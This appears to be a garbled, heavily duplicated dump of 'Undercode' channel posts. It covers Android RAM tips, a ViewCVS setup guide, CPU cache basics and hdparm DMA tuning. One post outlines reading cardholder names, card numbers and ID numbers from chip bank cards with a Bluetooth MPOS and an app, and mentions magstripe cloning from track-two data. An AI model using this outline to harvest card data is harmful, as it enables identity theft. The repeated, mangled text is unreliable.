In order to prevent unnecessary operation from consuming the storage space of the phone , it is recommended that the phone be turned off and on again from time to time.
π¦RAM (random access memory) random access memory (memory), which will lose its storage content when power is off, so it is mainly used to store programs used for a short time. The size of the RAM affects the loading speed and smoothness of the game. In addition, the operating system of Android 4.0 and above consumes 340MB of RAM . If the past 512MB of RAM is used , the lack of RAM is prone to cause the phone to run slowly or even crash. At present, most brands use 512MB of RAM for most mid- and low-end mobile phones based on cost considerations . Basically , it is not recommended to upgrade to Android 4.0 or higher operating system version .
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How improve android Ram 2020-Speedup 2020 by Undercode:
T.me/UndercodeTesting
π¦ ππΌππ πππΈβπ :
1) Delete unused widgets (desktop tools) or try to avoid downloading software to the desktop as a shortcut:
2)Android 4.0 operating system , after downloading software by google app , it will automatically download new software to the desktop as a shortcut , which will consume RAM. In addition to deleting the rarely used desktop shortcuts by yourself , you can also remove the " Add icon to home screen " or " Automatically add gadgets " option in the settings of Google PLAY
3) Using the management application tool, view the programs occupying RAM space:
Use the Android phone's own application management tool to delete the less-used programs that occupy RAM space and free up RAM space. Operation method: "Settings"> "Applications"> "Running", and then will occupy large but less RAM The application stopped.
4) Use the phone's built-in software or download management tool to terminate the process and free up memory RAM space:
When the user keeps opening the page , the RAM space is easily occupied. At present, many brands of mobile phones provide tools to free up RAM space (such as the tool manager of SAMSUNG ..) , there are many similar management tools in Google Play (see here for details ) , you can easily close the opened page , free up RAM space Out.
5) Turn on virtual RAM via Swapper and place it on SD memory card
Android phones can use SWAPPER app to put virtual RAM on SD memory card after flashing. However , this will be part of the SD card space as a way of RAM , you must take the risk of brush machine , and a slower reading speed of virtual RAM and easy consumption, hot and let the phone SD reduction in life , basically not recommended.
6) Shut down and re-enable
In order to prevent unnecessary operation from consuming the storage space of the phone , it is recommended that the phone be turned off and on again from time to time.
π¦RAM (random access memory) random access memory (memory), which will lose its storage content when power is off, so it is mainly used to store programs used for a short time. The size of the RAM affects the loading speed and smoothness of the game. In addition, the operating system of Android 4.0 and above consumes 340MB of RAM . If the past 512MB of RAM is used , the lack of RAM is prone to cause the phone to run slowly or even crash. At present, most brands use 512MB of RAM for most mid- and low-end mobile phones based on cost considerations . Basically , it is not recommended to upgrade to Android 4.0 or higher operating system version .
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ cvs service-ViewCVS install Howto full by undercode
twitter.com/undercodenews
π¦ ππΌππ πππΈβπ :
> ViewCVS is a software written in Python to view all data in the CVS code base. It has been used by many configuration management systems, and it is also a CVS auxiliary tool that can be selected in open source products like cvsweb.
Preparations before installation The
following software should already be installed on your system:
1) Python 1.5 or above, this one can also be installed, because ports will determine whether it is installed at compile time, if not installed it will automatically compile and Installed.
2) cvs, cvs is already built in FreeBSD, so don't worry.
3) mysql 3.22 and above, if you need viewcvs to store data into mysql, why should you install this software in advance. Note that this software is not required for viewcvs to run.
π¦ Installing ViewCVS
under FreeBSD Installing ViewCVS under FreeBSD is very simple, you can install via ports:
root @ ~ $ cd / usr / ports / devel / viewcvs /
root @ / usr / ports / devel / viewcvs $ make install; make Clean
1) ViewCVS is installed in the viewcvs-version directory in / usr / local (current version is 0.9.2).
Configure basic ViewCVS
2) Copy viewcvs.conf.dist from viewcvs into a copy called viewcvs.conf. This file is the main configuration file used by viewcvs. In this file, you need to set at least the following parameters:
# cvs_roots
# default_root
# rcs_path
# mime_types_file
cvs_roots settings
3) The original settings of cvs_roots in viewcvs.conf are:
cvs_roots =
Development: / home / cvsroot
4) We need to set all cvsroot for viewcvs to display One by one added to the list, the format is [CVSROOT name]: [CVSROOT path], the following is an example of my setting:
cvs_roots =
maven: / home /
cvsd / cvs / maven, hdsite: / home / cvsd / cvs / hdsite,
bsdhowto: / home / cvsd / cvs / bsdhowto
5) Here I set up three CVSRoots for viewcvs to see. Their names are maven, hdsite, bsdhowto. Note that the settings between each CVSRoot separated by commas
default_root
> default_root is used to set the default home page cvsroot project ViewCVS displayed.
rcs_path
6) The original setting of rcs_path in viewcvs.conf is not available:
#rcs_path = / usr / bin /
π¦ We can see that it has been commented out. If your rcs command is not in the / usr / bin directory, why not remove the comment? , Change to the path where rcs is located. Under FreeBSD, the default rcs is under / usr / bin, so this setting can be left unchanged.
mime_types_file
has no mime_types_file setting in viewcvs.conf:
#mime_types_file = /usr/local/apache/conf/mime.types
1) We can point it to Apache's mime setting, or we can write a new setting ourselves, I feel It is not used by the web server. It should be a configuration item used when running independently.
Other configuration of ViewCVS
2) In addition to the basic settings, there are other settings that are also useful. Here we will explain some useful settings.
Other settings in [general]
address is used to set the email of the management contact displayed on the page
address = HD
[vhosts] virtual host support
3 ) If you have multiple virtual hosts to use the same cgi, you will find each host Different settings of viewcvs.conf may be required, which is why the setting of vhost is possible in viewcvs.conf. This is the original description of
viewcvs.conf : # vhost1 = glob1, glob2
# vhost2 = glob3, glob4
# [vhost1-section]
# option = value
# [vhost1-othersection]
# option = value
# [vhost2-section]
# option = value
4) can be seen at a glance, use a name for a virtual host, and explain the virtual host The corresponding url. Each virtual host can set all section attributes, and the name of the section plus the name of the virtual host is sufficient. This is an example I set up:
site = site.example.com
site2 = site2.dns exmaple.com
[mavencn-general]
default_root = maven
[bsd-general]
default_root = bsdhowto
π¦ cvs service-ViewCVS install Howto full by undercode
twitter.com/undercodenews
π¦ ππΌππ πππΈβπ :
> ViewCVS is a software written in Python to view all data in the CVS code base. It has been used by many configuration management systems, and it is also a CVS auxiliary tool that can be selected in open source products like cvsweb.
Preparations before installation The
following software should already be installed on your system:
1) Python 1.5 or above, this one can also be installed, because ports will determine whether it is installed at compile time, if not installed it will automatically compile and Installed.
2) cvs, cvs is already built in FreeBSD, so don't worry.
3) mysql 3.22 and above, if you need viewcvs to store data into mysql, why should you install this software in advance. Note that this software is not required for viewcvs to run.
π¦ Installing ViewCVS
under FreeBSD Installing ViewCVS under FreeBSD is very simple, you can install via ports:
root @ ~ $ cd / usr / ports / devel / viewcvs /
root @ / usr / ports / devel / viewcvs $ make install; make Clean
1) ViewCVS is installed in the viewcvs-version directory in / usr / local (current version is 0.9.2).
Configure basic ViewCVS
2) Copy viewcvs.conf.dist from viewcvs into a copy called viewcvs.conf. This file is the main configuration file used by viewcvs. In this file, you need to set at least the following parameters:
# cvs_roots
# default_root
# rcs_path
# mime_types_file
cvs_roots settings
3) The original settings of cvs_roots in viewcvs.conf are:
cvs_roots =
Development: / home / cvsroot
4) We need to set all cvsroot for viewcvs to display One by one added to the list, the format is [CVSROOT name]: [CVSROOT path], the following is an example of my setting:
cvs_roots =
maven: / home /
cvsd / cvs / maven, hdsite: / home / cvsd / cvs / hdsite,
bsdhowto: / home / cvsd / cvs / bsdhowto
5) Here I set up three CVSRoots for viewcvs to see. Their names are maven, hdsite, bsdhowto. Note that the settings between each CVSRoot separated by commas
default_root
> default_root is used to set the default home page cvsroot project ViewCVS displayed.
rcs_path
6) The original setting of rcs_path in viewcvs.conf is not available:
#rcs_path = / usr / bin /
π¦ We can see that it has been commented out. If your rcs command is not in the / usr / bin directory, why not remove the comment? , Change to the path where rcs is located. Under FreeBSD, the default rcs is under / usr / bin, so this setting can be left unchanged.
mime_types_file
has no mime_types_file setting in viewcvs.conf:
#mime_types_file = /usr/local/apache/conf/mime.types
1) We can point it to Apache's mime setting, or we can write a new setting ourselves, I feel It is not used by the web server. It should be a configuration item used when running independently.
Other configuration of ViewCVS
2) In addition to the basic settings, there are other settings that are also useful. Here we will explain some useful settings.
Other settings in [general]
address is used to set the email of the management contact displayed on the page
address = HD
[vhosts] virtual host support
3 ) If you have multiple virtual hosts to use the same cgi, you will find each host Different settings of viewcvs.conf may be required, which is why the setting of vhost is possible in viewcvs.conf. This is the original description of
viewcvs.conf : # vhost1 = glob1, glob2
# vhost2 = glob3, glob4
# [vhost1-section]
# option = value
# [vhost1-othersection]
# option = value
# [vhost2-section]
# option = value
4) can be seen at a glance, use a name for a virtual host, and explain the virtual host The corresponding url. Each virtual host can set all section attributes, and the name of the section plus the name of the virtual host is sufficient. This is an example I set up:
site = site.example.com
site2 = site2.dns exmaple.com
[mavencn-general]
default_root = maven
[bsd-general]
default_root = bsdhowto
5) I set up two virtual hosts: mavencn and bsd Corresponding to site.example.com and site.example2dns.com respectively. The default_root attribute in the general section is set for the two virtual hosts below.
π¦ Installation precautions
First of all, you must pay attention to the file and directory permission settings in CVS. You must give the web server running account read permissions. When I use the cvsd service in ports in FreeBSD, I set its umask to 022.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Installation precautions
First of all, you must pay attention to the file and directory permission settings in CVS. You must give the web server running account read permissions. When I use the cvsd service in ports in FreeBSD, I set its umask to 022.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Can you read the ID number from the bank card, do you believe it?
Can you read the ID number from your bank card?
pinterest.com/UnderCodeOfficial
π¦ ππΌππ πππΈβπ :
1) When it comes to sensitive information, everyone first thinks of the ID number.
2) What harm will happen if the ID number is leaked? The offenders use it to handle credit cards, report your bank card, intermediary fraud, use your information to commit illegal crimes, etc. The harm in this is really inevitable. Today, I will work with you to read the ID number from the bank card with chip.
π¦ Bank card background
!) From a security point of view, the magnetic stripe card has gradually withdrawn from the historical stage. At present, clone cards and stolen brushes that are frequently issued occur on magnetic stripe cards. Because magnetic stripe cards have only three tracks to store information, The bank card generally only needs to obtain the two-track data to complete the cloning of the bank card, and the two-track data can be easily obtained through a credit card reader of tens of yuan.
2) However, changing to a bank card with a chip is too secure. The issuing bank certificate, IC card public certificate, and certification center certificate are public and private keys that guarantee offline bank card transactions. And online transactions are more secure, requiring the UnionPay back office to strictly check the data of each domain in each card.
3) Although IC cards have the aforementioned security features, there is still a risk of obtaining sensitive information. According to the transaction process of the australia Financial Integrated Circuit IC Card specification, people with ulterior motives can use POS to obtain IC card application selection, application initialization, and read application data steps to obtain interactive data. The TLV format application data obtained at this step may contain Cardholder's identification number. Here are the specific steps.
π¦What I want to accomplish in the experiment:
1) Mobile phone: Use the SDK provided by the Bluetooth chip manufacturer to develop the Android version of the app "Bluetooth MPOS", and MPOS and APP "Bluetooth MPOS" use Bluetooth for data interaction
2) POS side: write the program in the MPOS microcontroller to complete the IC card data exchange, obtain the cardholder name, card number, and cardholder ID number.
Note: interested in technology can communicate privately
3) After the pairing is completed, execute the "Cardholder Personal Information" button on the collection side
4) After the MPOS terminal interacts with the IC to obtain TLV format data, it finds sensitive information and uploads it to the mobile phone
5) The mobile app analyzes the name, card number, and identity data sent by the POS
The obtained name, card number and ID number are displayed.
π¦From the above experiments, the debit card can read out the name, certificate number and card number on a mobile phone and a card reader without the need for Internet connection. But don't worry too much, because the name and ID number are not necessary data in the card, which means that not all cards can read the cardholder's name and ID number. Of course, even the card that can be read out cannot be operated by anyone
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Can you read the ID number from the bank card, do you believe it?
Can you read the ID number from your bank card?
pinterest.com/UnderCodeOfficial
π¦ ππΌππ πππΈβπ :
1) When it comes to sensitive information, everyone first thinks of the ID number.
2) What harm will happen if the ID number is leaked? The offenders use it to handle credit cards, report your bank card, intermediary fraud, use your information to commit illegal crimes, etc. The harm in this is really inevitable. Today, I will work with you to read the ID number from the bank card with chip.
π¦ Bank card background
!) From a security point of view, the magnetic stripe card has gradually withdrawn from the historical stage. At present, clone cards and stolen brushes that are frequently issued occur on magnetic stripe cards. Because magnetic stripe cards have only three tracks to store information, The bank card generally only needs to obtain the two-track data to complete the cloning of the bank card, and the two-track data can be easily obtained through a credit card reader of tens of yuan.
2) However, changing to a bank card with a chip is too secure. The issuing bank certificate, IC card public certificate, and certification center certificate are public and private keys that guarantee offline bank card transactions. And online transactions are more secure, requiring the UnionPay back office to strictly check the data of each domain in each card.
3) Although IC cards have the aforementioned security features, there is still a risk of obtaining sensitive information. According to the transaction process of the australia Financial Integrated Circuit IC Card specification, people with ulterior motives can use POS to obtain IC card application selection, application initialization, and read application data steps to obtain interactive data. The TLV format application data obtained at this step may contain Cardholder's identification number. Here are the specific steps.
π¦What I want to accomplish in the experiment:
1) Mobile phone: Use the SDK provided by the Bluetooth chip manufacturer to develop the Android version of the app "Bluetooth MPOS", and MPOS and APP "Bluetooth MPOS" use Bluetooth for data interaction
2) POS side: write the program in the MPOS microcontroller to complete the IC card data exchange, obtain the cardholder name, card number, and cardholder ID number.
Note: interested in technology can communicate privately
3) After the pairing is completed, execute the "Cardholder Personal Information" button on the collection side
4) After the MPOS terminal interacts with the IC to obtain TLV format data, it finds sensitive information and uploads it to the mobile phone
5) The mobile app analyzes the name, card number, and identity data sent by the POS
The obtained name, card number and ID number are displayed.
π¦From the above experiments, the debit card can read out the name, certificate number and card number on a mobile phone and a card reader without the need for Internet connection. But don't worry too much, because the name and ID number are not necessary data in the card, which means that not all cards can read the cardholder's name and ID number. Of course, even the card that can be read out cannot be operated by anyone
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Pinterest
UndercOde (UNDERCODEOFFICIAL) on Pinterest
UndercOde | πππππ£βπ ππ πππ€π₯πππ βπ ππ‘πππͺ:
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Speed ββoptimization-read and write on memory
instagram.com/undercodetestingcompany
π¦ ππΌππ πππΈβπ :
Inside the computer, data reading and writing is realized step by step.
1) read the situation: a data to reach the cpu from the outside, you must go through external storage ---> "memory ---" "second-level cache ---" "first-level cache ---" "cpu register ---" participate in calculation .
2) Writing: Generally, the data generated by the CPU is not (and may not be) written to external storage immediately. Then these data are often retained in the cache or memory first, and the write action will not take place until the CPU informs the write.
3) When multiple data are to be read, they are queued. Similarly, when multiple data are to be written, they are also queued.
4) When there are read and write requests at the same time, the CPU must arrange their order.
π¦ Examples:
1) The CPU needs to read a piece of data: If the data is not found in the current instruction register, the CPU will look up the L1 cache, if not, it will look at the L2 cache, and then the memory and external storage.
2) After the CPU reads in a piece of data, the memory, L2 cache, and L1 cache all have the data. As data reads increase, the cache becomes full. At this time, a strategy of giving up is needed. First-in-first-out or first-in-first-out method, there is another strategy: the most used data is retained.
3) In this way, there is a lot of data in the cache or memory. When the CPU is looking for data, it also needs a strategy: association (full association, semi-association, partial association). That is, the cache is divided into several relatively independent areas, and the data is searched according to a certain strategy when searching for data, which will be more efficient.
4) When the CPU has data to be "written" to the cache, such data should be preferentially retained until the CPU "write" notification arrives.
5) When the read and write requirements occur at the same time, two situations will occur: read first and then write, and write first and then read.
π¦ Both situations must be carefully considered. such as:
1) The data address to be written is exactly the data address to be read. Read first and write later make the old data read. When you need the latest data, an error occurs; write first and read later make the original data overwritten. When you need the original data, read it at this time. The data is also wrong.
2) Although the data address to be written is not the data to be read immediately, its intermediate results are still retained in the cache. This will also produce errors.
This is also called data correlation. Try to avoid (or reduce) data correlation when designing your program. Although the program is compiled to optimize data dependencies.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Speed ββoptimization-read and write on memory
instagram.com/undercodetestingcompany
π¦ ππΌππ πππΈβπ :
Inside the computer, data reading and writing is realized step by step.
1) read the situation: a data to reach the cpu from the outside, you must go through external storage ---> "memory ---" "second-level cache ---" "first-level cache ---" "cpu register ---" participate in calculation .
2) Writing: Generally, the data generated by the CPU is not (and may not be) written to external storage immediately. Then these data are often retained in the cache or memory first, and the write action will not take place until the CPU informs the write.
3) When multiple data are to be read, they are queued. Similarly, when multiple data are to be written, they are also queued.
4) When there are read and write requests at the same time, the CPU must arrange their order.
π¦ Examples:
1) The CPU needs to read a piece of data: If the data is not found in the current instruction register, the CPU will look up the L1 cache, if not, it will look at the L2 cache, and then the memory and external storage.
2) After the CPU reads in a piece of data, the memory, L2 cache, and L1 cache all have the data. As data reads increase, the cache becomes full. At this time, a strategy of giving up is needed. First-in-first-out or first-in-first-out method, there is another strategy: the most used data is retained.
3) In this way, there is a lot of data in the cache or memory. When the CPU is looking for data, it also needs a strategy: association (full association, semi-association, partial association). That is, the cache is divided into several relatively independent areas, and the data is searched according to a certain strategy when searching for data, which will be more efficient.
4) When the CPU has data to be "written" to the cache, such data should be preferentially retained until the CPU "write" notification arrives.
5) When the read and write requirements occur at the same time, two situations will occur: read first and then write, and write first and then read.
π¦ Both situations must be carefully considered. such as:
1) The data address to be written is exactly the data address to be read. Read first and write later make the old data read. When you need the latest data, an error occurs; write first and read later make the original data overwritten. When you need the original data, read it at this time. The data is also wrong.
2) Although the data address to be written is not the data to be read immediately, its intermediate results are still retained in the cache. This will also produce errors.
This is also called data correlation. Try to avoid (or reduce) data correlation when designing your program. Although the program is compiled to optimize data dependencies.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Speed ββoptimization-enable hard disk DMA support
fb.com/undercodetesting
π¦ ππΌππ πππΈβπ :
DMA support is not enabled after the anonymous system is installed. In order to improve efficiency, you can enable it:
1) /etc/rc.d/rc.local Add a line / sbin / hdparm -d1 -c3 -m16 / dev / hda
If your hard disk supports ATA33, you can add -X66, ATA66 is -X68.
2) For example, ATA66 is: / sbin / hdparm -d1 -X68 -c3 -m16 / dev / hda
3) We can use hdparm -Tt / dev / hda to test the effect before and after joining. The above tests pay attention to the disaster problems that may bring data, please do not use it at will.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Speed ββoptimization-enable hard disk DMA support
fb.com/undercodetesting
π¦ ππΌππ πππΈβπ :
DMA support is not enabled after the anonymous system is installed. In order to improve efficiency, you can enable it:
1) /etc/rc.d/rc.local Add a line / sbin / hdparm -d1 -c3 -m16 / dev / hda
If your hard disk supports ATA33, you can add -X66, ATA66 is -X68.
2) For example, ATA66 is: / sbin / hdparm -d1 -X68 -c3 -m16 / dev / hda
3) We can use hdparm -Tt / dev / hda to test the effect before and after joining. The above tests pay attention to the disaster problems that may bring data, please do not use it at will.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Facebook
UndercOde Testing Company
UndercOde Testing Company. 97 likes Β· 2 talking about this. Programming, Hacking,Security, Web & Applications Developpements, Fix Errors , Hosts, Server Security, Hacking Pentest, Phone softwares &...
π¦ Well for now tutorials :
> Speed optimization-enable hard disk DMA support
> good BIN WWE NETWORT
>Speed optimization-read and write on memory
> Can you read the ID number from the bank card, do you believe it?
Can you read the ID number from your bank card?
> cvs service-ViewCVS install Howto full by undercode
@UnderCodeTesting - e n j o y
> Speed optimization-enable hard disk DMA support
> good BIN WWE NETWORT
>Speed optimization-read and write on memory
> Can you read the ID number from the bank card, do you believe it?
Can you read the ID number from your bank card?
> cvs service-ViewCVS install Howto full by undercode
@UnderCodeTesting - e n j o y